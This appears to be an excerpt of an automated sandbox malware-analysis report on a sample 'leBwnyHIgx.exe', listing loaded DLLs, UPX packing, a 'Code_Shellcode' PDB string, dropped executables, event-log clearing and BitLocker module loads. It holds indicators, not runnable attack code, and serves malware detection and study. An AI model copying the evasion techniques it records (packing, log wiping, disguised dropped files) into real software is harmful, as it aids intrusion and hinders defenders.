                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: leBwnyHIgx.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: leBwnyHIgx.exeStatic file information: File size 2581432 > 1048576
                      Source: leBwnyHIgx.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x258200
                      Source: leBwnyHIgx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb source: leBwnyHIgx.exe, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: leBwnyHIgx.exe, 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbu source: powershell.exe, 0000000B.00000002.1806539404.0000000006E91000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0 source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb{/; source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_03077490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,5_2_03077490
                      Source: leBwnyHIgx.exe.0.drStatic PE information: real checksum: 0x280db4 should be: 0x276fb6
                      Source: leBwnyHIgx.exeStatic PE information: real checksum: 0x280db4 should be: 0x276fb6
                      Source: leBwnyHIgx.exeStatic PE information: section name: .didata
                      Source: leBwnyHIgx.exe.0.drStatic PE information: section name: .didata
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0063B070 push ecx; mov dword ptr [esp], ecx0_2_0063B075
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_005DE0D8 push ecx; mov dword ptr [esp], ecx0_2_005DE0DC
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0047A268 push ecx; mov dword ptr [esp], ecx0_2_0047A26C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00432368 push ecx; mov dword ptr [esp], edx0_2_0043236B
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00415334 push ss; retf 0_2_004153F8
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0040D570 push ecx; mov dword ptr [esp], eax0_2_0040D575
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0040E5E0 push 0040E663h; ret 0_2_0040E65B
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0040A5A0 push ecx; mov dword ptr [esp], edx0_2_0040A5A1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00479670 push ecx; mov dword ptr [esp], ecx0_2_00479675
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_004216D8 push ecx; mov dword ptr [esp], ecx0_2_004216DB
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00421714 push ecx; mov dword ptr [esp], ecx0_2_00421718
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00410734 push ecx; mov dword ptr [esp], edx0_2_00410735
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_004C5794 push ecx; mov dword ptr [esp], edx0_2_004C5795
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00410868 push ecx; mov dword ptr [esp], ecx0_2_0041086D
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_004FACA0 push ecx; mov dword ptr [esp], eax0_2_004FACA3
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0042CE20 push ecx; mov dword ptr [esp], edx0_2_0042CE22
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0047BF34 push ecx; mov dword ptr [esp], edx0_2_0047BF35
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_100172C7 push eax; ret 0_2_100172C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04A0629D push eax; ret 3_2_04A06351
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0063B070 push ecx; mov dword ptr [esp], ecx5_2_0063B075
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_005DE0D8 push ecx; mov dword ptr [esp], ecx5_2_005DE0DC
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0047A268 push ecx; mov dword ptr [esp], ecx5_2_0047A26C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00432368 push ecx; mov dword ptr [esp], edx5_2_0043236B
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00415334 push ss; retf 5_2_004153F8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0040D570 push ecx; mov dword ptr [esp], eax5_2_0040D575
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0040E5E0 push 0040E663h; ret 5_2_0040E65B
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0040A5A0 push ecx; mov dword ptr [esp], edx5_2_0040A5A1
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00479670 push ecx; mov dword ptr [esp], ecx5_2_00479675
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_004216D8 push ecx; mov dword ptr [esp], ecx5_2_004216DB
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00421714 push ecx; mov dword ptr [esp], ecx5_2_00421718
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00410734 push ecx; mov dword ptr [esp], edx5_2_00410735
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile created: C:\Users\user\Downloads\wpsv.5.6.3.exeJump to dropped file
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeJump to dropped file
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0063E56C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,0_2_0063E56C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_005B261C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,0_2_005B261C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0063E56C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,5_2_0063E56C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_005B261C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,5_2_005B261C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0307B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,5_2_0307B3C0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
